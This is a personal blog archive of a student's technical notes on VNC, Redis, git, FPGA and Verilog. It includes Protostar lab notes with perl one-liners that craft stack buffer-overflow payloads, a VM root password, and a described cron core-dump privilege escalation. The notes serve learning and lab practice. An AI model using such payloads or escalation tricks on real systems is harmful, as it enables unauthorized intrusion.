So I don't forget:
On trucks, start a VNC server.
On Charybdis, use Chicken of the VNC to connect.
I happened to ssh into a machine called iveco, and vncserver started running on display 3 (thus the 5900 + 3). Enter an ssh password and there you have it - a gooey, gui connection :3
This is the CS dept guide to VNC, though it does not use SSH tunneling.
Big Apple - Small Byte
Thursday, October 25, 2012
Sunday, October 7, 2012
Exercises by Exercise
(DRAFTS I SHOULD'VE POSTED BUT DIDN'T)
====================================================================
EXERCISE 0
Goal : Modify the 'modified' variable.
====================================================================
First off, include the directory for protostar executables in your shell PATH.
In the code, notice that modified is declared (and therefore stored) before buffer. The stack grows down but writes up, meaning modified has a higher address than buffer because it came first. Writing up from the base of buffer, we can provide too much input and change modified.
=====IMPLEMENTATION=====:
====================================================================
EXERCISE 1
Goal : Modify the 'modified' variable to a specific value (ABCD)
====================================================================
Note the important hint that "Protostar is little endian." When you don't take that into account, it fails.
=====IMPLEMENTATION=====:
====================================================================
EXERCISE 2
Goal : Modify the 'modified' variable to a specific value (ABCD)
====================================================================
Perl script
=====IMPLEMENTATION=====:
====================================================================
If you put the line:
set disassembly-flavor intel
in the file ~/.gdbinit it should work.
enable ssh server
READ THIS: http://insecure.org/stf/smashstack.html
[I SHOULD REALLY CLEAN THIS UP... EVENTUALLY....]
#0
perl -e 'print "A"x65' > attack0.sh
#1
perl -e 'print "A"x64, "dcba"' > attack1.sh
#2
set environment var with perl
get newline into buffer overflow ==> just use ' . '
#3
[picture from 4:20ish here 7/24]
perl -e 'print "a"x64 . "\x24\x84\x04\x08"' > attack3.txt
./stack3 < attack3.txt
#4
perl -e 'print "A"x76 . "\xf4\x83\x04\x08"' > attack4.txt
#5
[pic @ 5:35 7/24 here]
ON PROTOSTAR:
ip addr (get ip address )
TERMINAL ON OSX
ssh user@IPADDRESSHERE
user
bash
Go Redis! (Graph Database)
(DRAFT I SHOULD'VE POSTED BUT DIDN'T)
Redis Interactive Tutorial
My (redundant) summary:
- Access Data
- SET my_key "my_value"
- "OK"
- GET my_key
- (returns my_value)
- Manipulate Data
- DEL my_key
- returns 1
- INCR my_key
- returns new value
- SETNX my_key "my_value"
- sets if does not exist (T/F success)
- EXPIRE my_key time_limit_in_sec
- TTL my_key
- returns remaining lifespan in seconds
- -1 if immortal
- Basic Datatypes
- Set
- SADD my_set "my_value"
- SREM my_set "my_value"
- SMEMBERS my_set
- lists members
- SISMEMBER my_set "my_value"
- T/F is a member
- SUNION my_set my_other_set
- union of sets, deletes non-unique entries
- Sorted Set
- ZADD my_set my_param "my_value"
- ZRANGE my_set START# END#
- List
- LRANGE my_list #STRT #END
- 0 to -1 gives entire list
- LPUSH/LPOP my_list "my_value"
- pushes/pops to end of list
- RPUSH/RPOP my_list "my_value"
- pushes/pops to beginning of list
Wednesday, August 1, 2012
HAKHAKHAK
GET STARTED ON EXPLOIT EXERCISES
Memory Basics
Eric and I sat down and drew a picture of Memory Layout.
+ Stack Frames contain: Input Params, Local variables, and Saved Registers
+ EBP --> base points to top of stack
+ ESP --> points to bottom of current stack frame
+ EIP --> points to next instruction
+ Stack grows down but writes and reads up.
Buffer Overflow ===> Second stack frame has a lower address than first stack frame. Since the stack writes up, we can overflow the buffer and write over the rest of the frame until we get to the saved EIP.
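The same layout is behind Exercise 0 above (modified declared before buffer, so an over-long write into buffer reaches it) and the saved-EIP overwrite described here. The block below is an added example, not code from the original post or from the Protostar exercises: it models that layout in C with the defective shape (an unbounded copy) next to a hardened copy that refuses input which does not fit, so nothing past the buffer can ever be reached. BUF_LEN, copy_bounded and the other names are the example's own.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from the original post or the Protostar sources.
 * A fixed buffer sits next to an int that must stay 0; the first
 * function keeps the defect only to show its shape, the second rejects
 * over-long input before any byte is written. */

enum { BUF_LEN = 64 };

/* Defective shape: strcpy has no idea how big buffer is. Input of
 * BUF_LEN bytes or more runs past buffer and, on the layout the notes
 * describe, lands on whatever the compiler placed above it. Kept as the
 * "before" form; never called with long input (that is undefined). */
int modified_after_unsafe_copy(const char *input) {
    volatile int modified = 0;
    char buffer[BUF_LEN];
    strcpy(buffer, input);         /* defect: no bound */
    return modified != 0;
}

/* Hardened copy: the caller states the destination size and anything
 * that does not fit (terminator included) is rejected up front.
 * Returns 0 on success, -1 on rejection. */
int copy_bounded(char *dst, size_t dst_len, const char *input) {
    size_t n = strlen(input);
    if (dst_len == 0 || n >= dst_len) {
        return -1;
    }
    memcpy(dst, input, n + 1);     /* n + 1 bytes incl. NUL, fits by the check above */
    return 0;
}

/* Same layout as the defective version, with the bounded copy.
 * Returns 0 when the input was accepted and modified is still 0,
 * -1 when the input was rejected and buffer was left untouched. */
int modified_after_safe_copy(const char *input) {
    volatile int modified = 0;
    char buffer[BUF_LEN];
    if (copy_bounded(buffer, sizeof buffer, input) != 0) {
        return -1;
    }
    return modified != 0;          /* always 0: nothing could spill over */
}

/* Constructed test input of n 'A' characters, like perl -e 'print "A"x65'. */
void fill_a(char *out, size_t n) {
    memset(out, 'A', n);
    out[n] = '\0';
}

/* Result of the hardened path for n 'A' characters (-2 if n is too
 * large for the scratch buffer used here). */
int safe_result_for_n_as(size_t n) {
    char input[256];
    if (n >= sizeof input) {
        return -2;
    }
    fill_a(input, n);
    return modified_after_safe_copy(input);
}

int main(void) {
    printf("63 x 'A': %d\n", safe_result_for_n_as(63));   /* 0: accepted, modified untouched */
    printf("64 x 'A': %d\n", safe_result_for_n_as(64));   /* -1: rejected, no room for the NUL */
    printf("65 x 'A': %d\n", safe_result_for_n_as(65));   /* -1: rejected */
    return 0;
}
```

The check is on the length plus terminator, which is why 64 bytes is already rejected for a 64-byte buffer: a copy that fits the characters but not the NUL is the other classic off-by-one.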
Endian-ness... It's a Byte Thing
Ex. Represent this : 1234
Say each word represents a byte, and each letter is a bit (ignoring the 'well-actually' details.)
In big endian :
ONE | TWO | THREE | FOUR
Little equivalent of this is :
FOUR | THREE | TWO | ONE
NOT THIS:
RUOF EERHT OWT ENO
The order of bytes is interpreted differently, but the byte content is unaltered. The bits in the bytes don't mirror.
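To make the "bytes reverse, bits don't" point concrete, here is an added example (not code from the original post) that lays the address 0x08048424 out in both byte orders. It is the reason the perl one-liners in these notes spell that address as "\x24\x84\x04\x08"; mirror_bits shows the bit reversal that endianness does NOT perform. All function names are the example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not from the original post. One 32-bit value, shown
 * byte by byte in big- and little-endian order. */

/* Write v into out[4] least-significant byte first (little endian). */
void to_le_bytes(uint32_t v, unsigned char out[4]) {
    for (int i = 0; i < 4; i++) {
        out[i] = (unsigned char)(v >> (8 * i));
    }
}

/* Write v into out[4] most-significant byte first (big endian). */
void to_be_bytes(uint32_t v, unsigned char out[4]) {
    for (int i = 0; i < 4; i++) {
        out[3 - i] = (unsigned char)(v >> (8 * i));
    }
}

/* The i-th byte (0..3) of v as it sits in little-endian memory. */
unsigned char le_byte(uint32_t v, int i) {
    unsigned char b[4];
    to_le_bytes(v, b);
    return b[i];
}

/* The i-th byte (0..3) of v as it sits in big-endian memory. */
unsigned char be_byte(uint32_t v, int i) {
    unsigned char b[4];
    to_be_bytes(v, b);
    return b[i];
}

/* Reverse the order of the four bytes: what a little-endian machine
 * reads if it is handed the big-endian encoding, and vice versa. */
uint32_t byteswap32(uint32_t v) {
    unsigned char b[4];
    to_be_bytes(v, b);
    return (uint32_t)b[0] | ((uint32_t)b[1] << 8) |
           ((uint32_t)b[2] << 16) | ((uint32_t)b[3] << 24);
}

/* Reverse the bits inside one byte: the "RUOF EERHT OWT ENO" mistake.
 * Endianness never does this. */
unsigned char mirror_bits(unsigned char b) {
    unsigned char r = 0;
    for (int i = 0; i < 8; i++) {
        r = (unsigned char)((r << 1) | ((b >> i) & 1));
    }
    return r;
}

/* 1 if this host stores the low byte first (as the Protostar VM does). */
int host_is_little_endian(void) {
    uint32_t probe = 1;
    unsigned char first;
    memcpy(&first, &probe, 1);
    return first == 1;
}

static void dump(const char *label, const unsigned char b[4]) {
    printf("%-15s", label);
    for (int i = 0; i < 4; i++) {
        printf("%02x ", b[i]);
    }
    printf("\n");
}

int main(void) {
    uint32_t addr = 0x08048424u;   /* the address used in the stack3 one-liner */
    unsigned char le[4], be[4];
    to_be_bytes(addr, be);
    to_le_bytes(addr, le);
    dump("big endian:", be);       /* 08 04 84 24 */
    dump("little endian:", le);    /* 24 84 04 08 */
    printf("host is %s-endian\n", host_is_little_endian() ? "little" : "big");
    printf("0x84 with its bits mirrored would be 0x%02x, which never happens\n",
           mirror_bits(0x84));
    return 0;
}
```

Handing a little-endian machine the big-endian byte string is exactly the failure described under Exercise 1: byteswap32 shows the value it would actually read.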
Potential Tools
+ RATS Static Analysis
+ Splint
+ Radare - Disassembler! Basic commands to start with:
- r2 [name of executable]
- af @ sym.main <== analyze main function
- pdf @ sym.main <== print main (now analyzed) function
INSTALLING RADARE2 ( on PROTOSTAR vm )
su root
godmode
apt-get install flex bison   # dependencies for radare
git clone https://github.com/radare/radare2.git
./configure --prefix=/usr
make
make symstall
Next Post: Document all the Stack exercises! ...now to properly make sense of my messy notes... -__-;
Tuesday, July 31, 2012
More Git Tips - Pair Programming Setup
Nathan and I forked Nick's appletoo repo and can push/pull changes from our own branches.
=========================
A Few Useful Commands
=========================
Push upstream
git push -u origin [NAMEOFBRANCH]
Pull from specific remote server
git pull [REMOTESERVERNAME] [BRANCHNAME]
Add remote server
git remote add [LOCALSERVERNICKNAME] [URL]
=========================
A Few 'Oh-Duh' Commands
=========================
Check possible remote servers
git remote
Clear staging area
git reset
Check status
git status
Check differences
git diff
Tuesday, July 24, 2012
Exploitation -- The way I like it.
========================================================
Gibberbot
Possible Project / Contribution Candidate
========================================================
Notes
+ Uses XMPP protocol for messaging
+ Follow Gibberbot GitHub instructions
+ Helpful guide to fork-a-repo
FollowUp: Steffi continued on this project. Mostly code clean up. Project - Interest mismatch.
========================================================
Android
Area of Interest / Possible Project
========================================================
Notes
+ Mission = root an Android device using any available means.
+ Sub-Mission: Define 'available means.'
+ Downloaded Android Source (here)
o Takes at least an hour to grab everything.
Operating Systems Lab 1:
"One interesting case I found in my research was a program that set its current directory to /etc/cron.d (where scheduled tasks are stored). The hacker requested a core dump happen in the case of an emergency crash of his process, then recruited another process to kill it. The dump occurred, and chron treated it as a text file. When it was next run, because chron had root privileges and was running the process, the process also had root privileges."... Inspiration? ....
Understand a Pre-Existing Exploit
Eric and I traced this code, which successfully rooted Android v2.2
ARM Stack looks like this
Saturday, July 21, 2012
FPGA + Verilog
Board Details :
Misc Resources:
PICO Computing E-101
- Spartan 6 data sheets here
- "Data Sheet" here (crap)
- Chip Data Sheet here
Good for cryptography/cryptanalysis, huh? ... huuuuuh..... Zodiac killer project application... ?!? :D
================//==================
Using "VHDL: Learn By Example" to Understand VHDL:
Entity ENT_NAME is
port( VAR1: in std_logic;
VAR2: out std_logic_vector(7 downto 0);
...
VARN: in std_logic <--------------NO ";" for last entry
);
end ENT_NAME;
architecture ARCH_NAME of ENT_NAME is
component OTH_ENT_NAME is
port( A: in std_logic;
...
B: in std_logic <-------------------NO ;
);
end component;
signal SIG_NAME: std_logic;
...
begin
process( INP_VARS....)
begin
[LOGIC GOES HERE];
end process;
GATE_NAME: ENT_NAME port map (COMP_VARS=>ENT_VARS);
end ARCH_NAME;
VHDL QUESTION:
Q: When is a process necessary? For multi-line logic only? For dependencies or certain operations?
A: Processes are required to reuse code. (Change in parameter values triggers re-run).
================//==================
Verilog
Using "Verilog: Learn By Example"
Blocking vs. Non-Blocking assignments
+ = Blocks procedural flow (Assignment happens first. Rest blocked)
+ Use for time sensitive
+ <= Doesn't block
+ Can be executed w/o dependency/timing issues
+ Several register assignments in same time step
+ Resembles actual hardware more
Verilog QUESTIONS:
Q: When is it necessary to list "always @" parameters with "or" vs. a comma?
BLOGGER IS MESSING UP MY FREAKING FORMATTING. ^ GAAAAH
================//==================
Driver Issues:
Install Digilent Adept System (at least v2.4)
Install Plugin (follow pdf directions)
answers here maybe? http://www.xilinx.com/support/answers/30184.htm
Documentation we were following for DRIVERS http://www.xilinx.com/support/documentation/user_guides/ug344.pdf
NOPE^I HATE DRIVERS.
But not really.
Please work.
I'm soorrrrryjustworkplzstopthetortuuuureee....
*********USE THIS DRIVER - PICK 64 BIT EVEN IF ON 32 BIT ****************
================//==================
Immediate Goal: Run and understand this example.
- Helpful when adding pins...kinda...notreally....
- Testbench related here
================//==================
Misc Resources:
TestBench Tutorial
Verilog Tutorial
Verilog Workflow (Work flow, colorful tutorial)
Misc:
WANT (to make) --> Noisy Jelly
Understanding RSA